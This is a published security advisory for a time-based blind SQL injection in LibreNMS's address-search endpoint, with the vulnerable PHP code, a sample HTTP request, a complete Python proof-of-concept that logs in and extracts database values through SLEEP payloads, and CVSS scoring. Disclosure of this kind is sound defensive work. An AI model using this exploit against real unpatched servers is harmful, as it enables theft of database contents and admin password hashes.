LibreNMS has a Time-Based Blind SQL Injection in address-search.inc.php

Description

Summary

A time-based blind SQL injection vulnerability exists in address-search.inc.php via the address parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses.

Details

This vulnerability requires authentication and is exploitable by any authenticated user.

The vulnerable endpoint is at /ajax_table.php with the following request displaying the injection point.

POST /ajax_table.php HTTP/1.1
Host: 192.168.236.131
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.236.131
Connection: keep-alive
Referer: http://192.168.236.131/search
Cookie: laravel_session=[Authenticated user cookie]

current=1&rowCount=55&sort%5Bhostname%5D=asc&searchPhrase=&id=address-search&search_type=ipv4&device_id=1&interface=&address=127.0.0.1/aa<injected SQL here>

Within includes/html/table/address-search.inc.php, the user-controlled $prefix variable derived from the address parameter is concatenated directly into the SQL query without sanitization or parameter binding on lines 34 and 52.

// Lines 16-35, 51-53
$address = $vars['address'] ?? '';
$prefix = '';
$sort = trim((string) $sort);

if (str_contains($address, '/')) {
    [$address, $prefix] = explode('/', $address, 2);
}

if ($search_type == 'ipv4') {
    $sql = ' FROM `ipv4_addresses` AS A, `ports` AS I, `devices` AS D';
    $sql .= ' WHERE I.port_id = A.port_id AND I.device_id = D.device_id ' . $where . ' ';

    if (! empty($address)) {
        $sql .= ' AND ipv4_address LIKE ?';
        $param[] = "%$address%";
    }

    if (! empty($prefix)) {
        $sql .= " AND ipv4_prefixlen='$prefix'";
    }

......

    if (! empty($prefix)) {
        $sql .= " AND ipv6_prefixlen = '$prefix'";
    }

PoC

The following Python script exploits the time-based blind SQL injection vulnerability to retrieve the value of SELECT CURRENT_USER() from the database:

#!/usr/bin/python3

import requests
import sys
import re

from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# Configured to be used with burpsuite on the default burpsuite port of 8080
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

# When None is returned it means that all values have been retrieved from the queried value in the target DB
def blind_binsearch_sqli(inj_str):
    try:
        a = range(32,126)
        start = 0
        end = len(a)
        while start <= end:
            mid = (start + end) // 2
            target_equal = inj_str.replace("[CHAR]", str(a[mid]))
            target_less = inj_str.replace("=[CHAR]", f"<{a[mid]}")

            # Return ascii decimal value for storing to a local string buffer
            if condition(target_equal):
                return a[mid]
            # Use lower half of the "a" array
            elif condition(target_less):
                end = mid - 1
            # Use upper half of the "a" array
            else:
                start = mid + 1
        return None
    except IndexError:
        return None


# Check injection result
def condition(payload):
    exploit_data = {
    "current": "1",
    "rowCount": "50",
    "sort[hostname]": "asc",
    "searchPhrase": "",
    "id": "address-search",
    "search_type": "ipv4",
    "device_id": "1",
    "interface": "",
    "address": f"127.0.0.1/aa{payload}"
    }
    # Payload must be slotted in somewhere in this code
    payload_url = f"{url}/ajax_table.php"

    r = s.post(payload_url, data=exploit_data)

    elapsed_time_seconds = r.elapsed.total_seconds()

    # If response time is within sleep function delay range of +1 or -1 second the query returned "true"
    if (elapsed_time_seconds + 1) > (sleep_delay * 2) and (elapsed_time_seconds - 1) < (sleep_delay * 2):
        return True
    else:
        return False


def get_length(inj):
    length = 0
    print(f"(+) Getting the length of \"{inj}\"")
    while True:
        # MySQL
        #length_injection_string = f" AND LENGTH(({inj}))={str(length)}-- -"
        length_injection_string = f"' AND (SELECT 1 FROM (SELECT IF(LENGTH(({inj}))={str(length)},SLEEP({sleep_delay}),0))x) AND '1'='1"

        bool_value = condition(length_injection_string)

        if bool_value == False:
            length += 1
        else:
            return length


def injection(inject_qry):
    extracted = ""
    length = get_length(inject_qry)
    print(f"Length of \"{inject_qry}\": {length}")
    print(f"(+) Retrieving the value for \"{inject_qry}\"")

    # +2 to length in order to automatically stop the injection once the None value is returned, meaning that the whole query value is extracted
    for i in range(1, length + 2):
        # MySQL
        injection_string = f"' AND (SELECT 1 FROM (SELECT IF(ASCII(SUBSTRING(({inject_qry}),{i},1))=[CHAR],SLEEP({sleep_delay}),0))x) AND '1'='1"

        retrieved_value = blind_binsearch_sqli(injection_string)

        if retrieved_value:
            extracted += chr(retrieved_value)
            extracted_char = chr(retrieved_value)
            print(extracted_char, flush=True, end="")
        elif retrieved_value == None:
            print("\n(+) done!\n")
            return extracted

global url
global s
global sleep_delay
global username
global password

# Default sleep delay, due to injection query used the response time will be sleep_delay * 2
sleep_delay = 1.5

s = requests.Session()

# HTTPS
s.verify = False

# Toggle debug proxy
#s.proxies.update(proxies)

url = "http://192.168.236.131"

username = "tester2"
password = "Adminbazinga"

if len(sys.argv) > 1:
    url = sys.argv[1]
if len(sys.argv) > 2:
    username = sys.argv[2]
if len(sys.argv) > 3:
    password = sys.argv[3]
if len(sys.argv) > 4:
    sleep_delay = float(sys.argv[4])

r = s.get(url + "/login")

login_token = re.search(r"name=\"_token\"\s+value=\"([^\"]+)\"", r.text).group(1)

login_data = {
"_token": login_token,
"username": username,
"password": password,
"submit": ""
}

r = s.post(url + "/login", data=login_data)

# Example: python3 script.py http://127.0.0.1 username password 1.5
if __name__ == "__main__":
    injection("SELECT CURRENT_USER()")

Tester user role:
<img width="771" height="154" alt="image" src="https://github.com/user-attachments/assets/fe13754c-9a41-48cb-934d-575097675c13" />

Example usage of PoC script:
<img width="924" height="104" alt="image" src="https://github.com/user-attachments/assets/6b1e19a9-4c73-4e44-8e16-851ff92d5960" />

Impact

  • Any authenticated user can exploit this vulnerability to extract sensitive information from the back-end database using time‑based blind SQL injection techniques.
  • This leads to unauthorised disclosure of database contents, including schema information and potentially sensitive application data.
  • An attacker can retrieve privileged accounts (e.g. administrative usernames) and their associated password hashes, potentially leading to privilege escalation within LibreNMS by cracking the password hashes and obtaining plaintext admin user credentials.

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-02-18 22:31:37 UTC
Updated
2026-02-18 22:31:38 UTC
GitHub reviewed
2026-02-18 22:31:37 UTC

EPSS Score

Score Percentile
0.00% 0.13%

CVSS Scores

Base score Version Severity Vector
8.8 3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:L)
A normal user session is enough; they don’t have to be admin.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:H)
Could take the service down hard or make it unusable for people who depend on it.

Identifiers

CWEs

CWE id Name
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Credits

  • quirmz (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
composer librenms/librenms < 26.2.0 26.2.0

References

cvelogic Threat Intelligence